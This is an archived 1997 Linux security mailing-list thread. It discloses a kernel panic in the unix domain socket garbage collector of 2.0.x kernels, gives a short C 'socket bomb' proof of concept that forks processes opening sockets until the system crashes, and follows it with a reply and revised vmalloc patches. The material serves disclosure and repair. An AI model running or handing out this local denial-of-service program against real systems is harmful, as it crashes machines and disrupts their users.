[Mod: linux-kernel removed from To: list. --alex]

-----BEGIN PGP SIGNED MESSAGE-----

Kernels 2.0.x do not sufficiently allocate space for the internal stack used
for garbage collection on unix domain sockets. I have neither examined nor
tested 2.1.x kernels.

Because the garbage collection system defines a MAX_STACK depth of 1000 for
it's internal use, it is relatively trivial to write a user-space
program which opens up a large number of unix domain sockets, eventually
causing a kernel panic in the garbage collection routines (which test for
this limit and panic if hit); on systems which have NR_FILE (or
/proc/sys/kernel/file-max) set to a value larger than 1024 or so. The
solution is slightly more complicated than simply increasing MAX_STACK, due
to the fact that a single page is allocated for the stack, and given an
i386 architecture, this can only hold 1024 entries.

The following illustrates how a user-space program might exploit this bug,
causing a kernel panic:

- --CUT HERE--
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>

void bomb()
{
    while(1) {
        while(socket(AF_UNIX, SOCK_STREAM, 0) != -1)
            ;
        sleep(5);
    }
}

int main()
{
    int i;

    printf("forking 6 unix socket bomb processes.\n");
    fflush(stdout);

    for(i = 0; i < 6; i++)
        if(fork() == 0)
            bomb();

    bomb();
    return 0;
}
- --CUT HERE--

I have tested this under 2.0.32 and verified the panic. I have even been
able to cause a panic on a system which does NOT have
/proc/sys/kernel/file-max > 1024.

As a work-around, the following patch will cause the garbage collection
routine to calculate the exact _maximum_ stack depth it must allocate for,
as well as using kmalloc()/kfree() instead of get_free_page()/free_page().

- --CUT HERE-
*** net/unix/garbage.c.orig Wed Dec 3 14:55:10 1997
- --- net/unix/garbage.c Wed Dec 3 15:04:57 1997
***************
*** 5,10 ****
- --- 5,20 ----
   * Copyright (C) Barak A. Pearlmutter.
   * Released under the GPL version 2 or later.
   *
+  * 12/3/97 -- Flood
+  * Internal stack is only allocated one page. On systems with NR_FILE
+  * > 1024, this makes it quite easy for a user-space program to open
+  * a large number of AF_UNIX domain sockets, causing the garbage
+  * collection routines to run up against the wall (and panic).
+  * Changed the MAX_STACK to be associated to the system-wide open file
+  * maximum, and use kmalloc() instead of get_free_page() [as more than
+  * one page may be necessary]. As noted below, this should ideally be
+  * done with a linked list.
+  *
   * Chopped about by Alan Cox 22/3/96 to make it fit the AF_UNIX socket problem.
   * If it doesn't work blame me, it worked when Barak sent it.
   *
***************
*** 59,68 ****

  /* Internal data structures and random procedures: */

- - #define MAX_STACK 1000 /* Maximum depth of tree (about 1 page) */
  static unix_socket **stack; /* stack of objects to mark */
  static int in_stack = 0; /* first free entry in stack */
!

  extern inline unix_socket *unix_get_socket(struct file *filp)
  {
- --- 69,77 ----

  /* Internal data structures and random procedures: */

  static unix_socket **stack; /* stack of objects to mark */
  static int in_stack = 0; /* first free entry in stack */
! static int max_stack; /* Calculated in unix_gc() */

  extern inline unix_socket *unix_get_socket(struct file *filp)
  {
***************
*** 110,116 ****

  extern inline void push_stack(unix_socket *x)
  {
!     if (in_stack == MAX_STACK)
          panic("can't push onto full stack");
      stack[in_stack++] = x;
  }
- --- 119,125 ----

  extern inline void push_stack(unix_socket *x)
  {
!     if (in_stack == max_stack)
          panic("can't push onto full stack");
      stack[in_stack++] = x;
  }
***************
*** 151,158 ****
      if(in_unix_gc)
          return;
      in_unix_gc=1;
!
!     stack=(unix_socket **)get_free_page(GFP_KERNEL);

      /*
       * Assume everything is now unmarked
- --- 160,170 ----
      if(in_unix_gc)
          return;
      in_unix_gc=1;
!
!     max_stack = max_files;
!
!     stack=(unix_socket **)kmalloc(max_stack * sizeof(unix_socket **),
!         GFP_KERNEL);

      /*
       * Assume everything is now unmarked
***************
*** 276,280 ****

      in_unix_gc=0;

!     free_page((long)stack);
  }
- --- 288,292 ----

      in_unix_gc=0;

!     kfree(stack);
  }

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBNIXFaRsjWkWelde9AQH58wQAh+AaooTq+AcNUVyKc5hIMb04vOmFkoVW
3DaaqFvtlQ9Z0XBnfagWqguNB5HRzEG1MifkhofwXuhy64qAhcev/qZroYqS/Q96
ZeGXsdf4KE3LmZ5PDSrYAIRSgQjKT9A9yw6nRQUNqr/Nis7Fz5y7oQYoo2g12Jjg
l9N4fmbmPeY=kPxr
-----END PGP SIGNATURE-----
[Mod: linux-kernel and flood@evcom.net (Floody) removed from the To: list -- alex]

> program which opens up a large number of unix domain sockets, eventually
> causing a kernel panic in the garbage collection routines (which test for
> this limit and panic if hit); on systems which have NR_FILE (or
> /proc/sys/kernel/file-max) set to a value larger than 1024 or so. The

Yep. I know about this. The as shipped systems are all fine, if you up
it you need to change it. 2.1.x fixed this a while ago

> ! stack=(unix_socket **)kmalloc(max_stack * sizeof(unix_socket **),
> ! GFP_KERNEL);

This is not good. With a very large set of fd's you can now have the kmalloc
hang forever deadlocking the fd recovery. Use vmalloc and your idea is
correct.

(see 2.1.x)
Floody
1997-Dec-03 23:18 UTC
Re: [linux-alert] Re: Insufficient allocations in net/unix/garbage.c
On Wed, 3 Dec 1997, Alan Cox wrote:

> > program which opens up a large number of unix domain sockets, eventually
> > causing a kernel panic in the garbage collection routines (which test for
> > this limit and panic if hit); on systems which have NR_FILE (or
> > /proc/sys/kernel/file-max) set to a value larger than 1024 or so. The
>
> Yep. I know about this. The as shipped systems are all fine, if you up
> it you need to change it. 2.1.x fixed this a while ago
>
> > ! stack=(unix_socket **)kmalloc(max_stack * sizeof(unix_socket **),
> > ! GFP_KERNEL);
>
> This is not good. With a very large set of fd's you can now have the kmalloc
> hang forever deadlocking the fd recovery. Use vmalloc and your idea is
> correct.
>
> (see 2.1.x)

I see. For everyone else's benefit, here is an amended patch that correctly
uses vmalloc() instead of kmalloc() in order to avoid the possible deadlocks
that Alan mentioned. Again, this is only necessary for 2.0.x kernels, when
the maximum number of open files has been increased beyond 1024 (which is
becoming increasingly common for heavily loaded production servers).

*** net/unix/garbage.c.orig Wed Dec 3 14:55:10 1997
--- net/unix/garbage.c Thu Dec 4 02:05:47 1997
***************
*** 5,10 ****
--- 5,20 ----
   * Copyright (C) Barak A. Pearlmutter.
   * Released under the GPL version 2 or later.
   *
+  * 12/3/97 -- Flood
+  * Internal stack is only allocated one page. On systems with NR_FILE
+  * > 1024, this makes it quite easy for a user-space program to open
+  * a large number of AF_UNIX domain sockets, causing the garbage
+  * collection routines to run up against the wall (and panic).
+  * Changed the MAX_STACK to be associated to the system-wide open file
+  * maximum, and use vmalloc() instead of get_free_page() [as more than
+  * one page may be necessary]. As noted below, this should ideally be
+  * done with a linked list.
+  *
   * Chopped about by Alan Cox 22/3/96 to make it fit the AF_UNIX socket problem.
   * If it doesn't work blame me, it worked when Barak sent it.
   *
***************
*** 59,68 ****

  /* Internal data structures and random procedures: */

- #define MAX_STACK 1000 /* Maximum depth of tree (about 1 page) */
  static unix_socket **stack; /* stack of objects to mark */
  static int in_stack = 0; /* first free entry in stack */
!

  extern inline unix_socket *unix_get_socket(struct file *filp)
  {
--- 69,77 ----

  /* Internal data structures and random procedures: */

  static unix_socket **stack; /* stack of objects to mark */
  static int in_stack = 0; /* first free entry in stack */
! static int max_stack; /* Calculated in unix_gc() */

  extern inline unix_socket *unix_get_socket(struct file *filp)
  {
***************
*** 110,116 ****

  extern inline void push_stack(unix_socket *x)
  {
!     if (in_stack == MAX_STACK)
          panic("can't push onto full stack");
      stack[in_stack++] = x;
  }
--- 119,125 ----

  extern inline void push_stack(unix_socket *x)
  {
!     if (in_stack == max_stack)
          panic("can't push onto full stack");
      stack[in_stack++] = x;
  }
***************
*** 151,158 ****
      if(in_unix_gc)
          return;
      in_unix_gc=1;
!
!     stack=(unix_socket **)get_free_page(GFP_KERNEL);

      /*
       * Assume everything is now unmarked
--- 160,173 ----
      if(in_unix_gc)
          return;
      in_unix_gc=1;
!
!     max_stack = max_files;
!
!     stack=(unix_socket **)vmalloc(max_stack * sizeof(unix_socket **));
!     if (!stack) {
!         in_unix_gc=0;
!         return;
!     }

      /*
       * Assume everything is now unmarked
***************
*** 276,280 ****

      in_unix_gc=0;

!     vfree(stack);
  }
--- 291,295 ----

      in_unix_gc=0;

!     vfree(stack);
  }